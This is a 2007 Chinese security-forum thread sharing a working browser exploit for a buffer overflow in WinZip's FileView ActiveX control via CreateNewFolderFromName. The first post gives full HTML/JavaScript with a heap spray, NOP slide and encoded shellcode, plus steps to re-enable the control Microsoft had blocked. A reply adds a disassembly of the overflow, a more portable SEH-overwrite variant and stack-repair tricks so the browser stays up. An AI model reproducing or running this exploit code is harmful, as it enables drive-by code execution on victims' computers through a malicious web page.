返回列表 回复 发帖
猪猪

论坛-最高决策

终身成就勋章优秀管理勋章核心成员
1#
打印
tT
发表于 2007-1-4 17:27 | 只看该作者

winzip FileView ActiveX Contorls CreateNewFolderFromName溢出exploit

之前看到过一个FileView ActiveX控件溢出的,不过不是这个函数,网上公布的溢出代码也不是很好用,
这个是CreateNewFolderFromName函数溢出的,不过由于前面一个漏洞的问题,微软似乎禁用了这个控件,
测试时可以删除
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A09AE68F-B14D-43ED-B713

-BA413F034904}]
"Compatibility Flags"=dword:00000400
元旦快乐!
Code:


</body>
</html>
<head>
<object classid="clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}" id="winzip">
</object>
</head>

<body>

<SCRIPT language="javascript">
    /*
    ---===[ winzip-exploit.html
    
        XiaoHui : 76693223[at]163.com
        HomePage: <a href="http://www.nipc.org.cn" target="_blank">www.nipc.org.cn</a>
        (c) 2006 All rights reserved.
        note:Because of the prior vuln in FileView ActiveX Control,Micorsoft has disabled this ActiveX Controls,
             To test this vuln,You can delete the key:
             [HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{A09AE68F-B14D-43ED-B713  

                   -BA413F034904}]
                     "Compatibility Flags"=dword:00000400
                     I have test the exploit on Windows 2000+sp4(CN) and Windows xp+sp2(CN) and Winzip 10.0(6667),you can try

                     other version,goodluck~
    ]===---
*/

var heapSprayToAddress = 0x0d0d0d0d;

    var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%

u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%

u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%

u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

    var heapBlockSize = 0x400000;

    var payLoadSize = payLoadCode.length * 2;

    var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

    var spraySlide = unescape("%u9090%u9090");
    spraySlide = getSpraySlide(spraySlide,spraySlideSize);

    heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

    memory = new Array();

    for (i=0;i<heapBlocks;i++)
    {
        memory[i] = spraySlide + payLoadCode;
    }
    

    var xh = 'A';
    while (xh.length < 231) xh+='A';
    xh+="x0dx0dx0dx0d";
    winzip.CreateNewFolderFromName(xh);
    function getSpraySlide(spraySlide, spraySlideSize)
    {
        while (spraySlide.length*2<spraySlideSize)
        {
            spraySlide += spraySlide;
        }
        spraySlide = spraySlide.substring(0,spraySlideSize/2);
        return spraySlide;
    }
    
</script>                                                                                                                     

                                       
</body>
</html>

收藏 分享 评分
回复 引用

订阅 TOP

猪猪

论坛-最高决策

终身成就勋章优秀管理勋章核心成员
2#
发表于 2007-1-4 17:27 | 只看该作者
分析了一下:

Codz:

03F03938    55              PUSH EBP
03F03939    8BEC            MOV EBP,ESP
03F0393B    81EC 70020000   SUB ESP,270
03F03941    53              PUSH EBX
03F03942    56              PUSH ESI
03F03943    8BF1            MOV ESI,ECX
03F03945    33DB            XOR EBX,EBX
03F03947    57              PUSH EDI
03F03948    8B86 3C030000   MOV EAX,DWORD PTR DS:[ESI+33C]
03F0394E    3BC3            CMP EAX,EBX
03F03950    74 58           JE SHORT wzfilvw.03F039AA
03F03952    68 08080200     PUSH 20808                               ; UNICODE "ExplorerIEXPLORE.EXE"
03F03957    8D8D 90FDFFFF   LEA ECX,DWORD PTR SS:[EBP-270]
03F0395D    68 60010000     PUSH 160
03F03962    51              PUSH ECX
03F03963    BF 00000040     MOV EDI,40000000
03F03968    53              PUSH EBX
03F03969    50              PUSH EAX
03F0396A    89BD 98FDFFFF   MOV DWORD PTR SS:[EBP-268],EDI
03F03970    FF15 C0E3F303   CALL DWORD PTR DS:[<&SHELL32.SHGetFileIn>; SHELL32.SHGetFileInfoA
03F03976    85BD 98FDFFFF   TEST DWORD PTR SS:[EBP-268],EDI
03F0397C    0F84 7D010000   JE wzfilvw.03F03AFF
03F03982    FFB6 48030000   PUSH DWORD PTR DS:[ESI+348]
03F03988    8D85 F0FEFFFF   LEA EAX,DWORD PTR SS:[EBP-110]
03F0398E    50              PUSH EAX
03F0398F    68 00800000     PUSH 8000
03F03994    FFB6 3C030000   PUSH DWORD PTR DS:[ESI+33C]
03F0399A    FFB6 44030000   PUSH DWORD PTR DS:[ESI+344]
03F039A0    E8 4CA80000     CALL wzfilvw.03F0E1F1
03F039A5    83C4 14         ADD ESP,14
03F039A8    EB 38           JMP SHORT wzfilvw.03F039E2
03F039AA    8D45 F4         LEA EAX,DWORD PTR SS:[EBP-C]
03F039AD    50              PUSH EAX
03F039AE    53              PUSH EBX
03F039AF    FFB6 D0010000   PUSH DWORD PTR DS:[ESI+1D0]
03F039B5    FF15 CCE3F303   CALL DWORD PTR DS:[<&SHELL32.SHGetSpecia>; SHELL32.SHGetSpecialFolderLocation
03F039BB    85C0            TEST EAX,EAX
03F039BD    0F85 3C010000   JNZ wzfilvw.03F03AFF
03F039C3    8D85 F0FEFFFF   LEA EAX,DWORD PTR SS:[EBP-110]
03F039C9    50              PUSH EAX
03F039CA    FF75 F4         PUSH DWORD PTR SS:[EBP-C]
03F039CD    FF15 D0E3F303   CALL DWORD PTR DS:[<&SHELL32.SHGetPathFr>; SHELL32.SHGetPathFromIDListA
03F039D3    8B86 48030000   MOV EAX,DWORD PTR DS:[ESI+348]
03F039D9    FF75 F4         PUSH DWORD PTR SS:[EBP-C]
03F039DC    8B08            MOV ECX,DWORD PTR DS:[EAX]
03F039DE    50              PUSH EAX
03F039DF    FF51 14         CALL DWORD PTR DS:[ECX+14]
03F039E2    8D85 F0FEFFFF   LEA EAX,DWORD PTR SS:[EBP-110]
03F039E8    50              PUSH EAX
03F039E9    E8 F2BA0100     CALL wzfilvw.03F1F4E0
03F039EE    8BF8            MOV EDI,EAX
03F039F0    59              POP ECX
03F039F1    80BC3D EFFEFFFF>CMP BYTE PTR SS:[EBP+EDI-111],5C
03F039F9    74 14           JE SHORT wzfilvw.03F03A0F
03F039FB    8D85 F0FEFFFF   LEA EAX,DWORD PTR SS:[EBP-110]
03F03A01    68 14FAF403     PUSH wzfilvw.03F4FA14
03F03A06    50              PUSH EAX
03F03A07    E8 F4B90100     CALL wzfilvw.03F1F400
03F03A0C    59              POP ECX
03F03A0D    47              INC EDI
03F03A0E    59              POP ECX
03F03A0F    FF75 08         PUSH DWORD PTR SS:[EBP+8]
03F03A12    8D843D F0FEFFFF LEA EAX,DWORD PTR SS:[EBP+EDI-110]
03F03A19    50              PUSH EAX
03F03A1A    E8 E1B90100     CALL wzfilvw.03F1F400                     ;在这里溢出了




修改了一下LZ核心代码使得更加通用

Codz:

</body>
</html>
<head>
<object classid="clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}" id="winzip">
</object>
</head>

<body>

<SCRIPT language="javascript">

    var axis = 0xdeadbeef;

    var payLoadCode = unescape("%uPut Your Shellcode Here!");

  var heapSprayToAddress = 0x0c010101;



    var payLoadSize = payLoadCode.length * 2;

    var spraySlide = unescape("%u9090%u9090");
    
    var heapBlockSize = 0x100000;    

    var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
    
    


    spraySlide = get_SpraySlide(spraySlide,spraySlideSize);

    heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;

    memory = new Array();

    for (i=0;i<heapBlocks;i++)
    {
        memory[i] = spraySlide + payLoadCode;
    }



    function get_SpraySlide(spraySlide, spraySlideSize)
    {
        while (spraySlide.length*2<spraySlideSize)
        {
            spraySlide += spraySlide;
        }
        spraySlide = spraySlide.substring(0,spraySlideSize/2);
        return spraySlide;
    }

</script>        

                                                                                           

<script>
    function fuck()
    {
            var xh = 'A';
    while (xh.length < 243) xh+='A';
    while (xh.length < 433)
    xh+="\x0c\x0c\x0c\x0c";
    winzip.CreateNewFolderFromName(xh);
  }
  </script>
  
  
    <script>java script:fuck();</script>    
        
        
                                       
</body>
</html>





因为这个漏洞也跟系统的目录有关,而在不同系统上目录可能会不一样,所以不通用,故改为了覆盖seh的方式,让xh的值一路覆盖到433个bytes,保证覆盖了seh


在shellcode最后使用
Codz:

add esp, 12ch
pop ebp
retn 1ch


可以恢复栈平衡,以达到不挂ie的效果。




另外winzip这个东西会有时候会弹出个窗口。


PS:难怪我调试以前那个winzip的漏洞时触发不了,原来是被MS禁用了
回复 引用

TOP

返回列表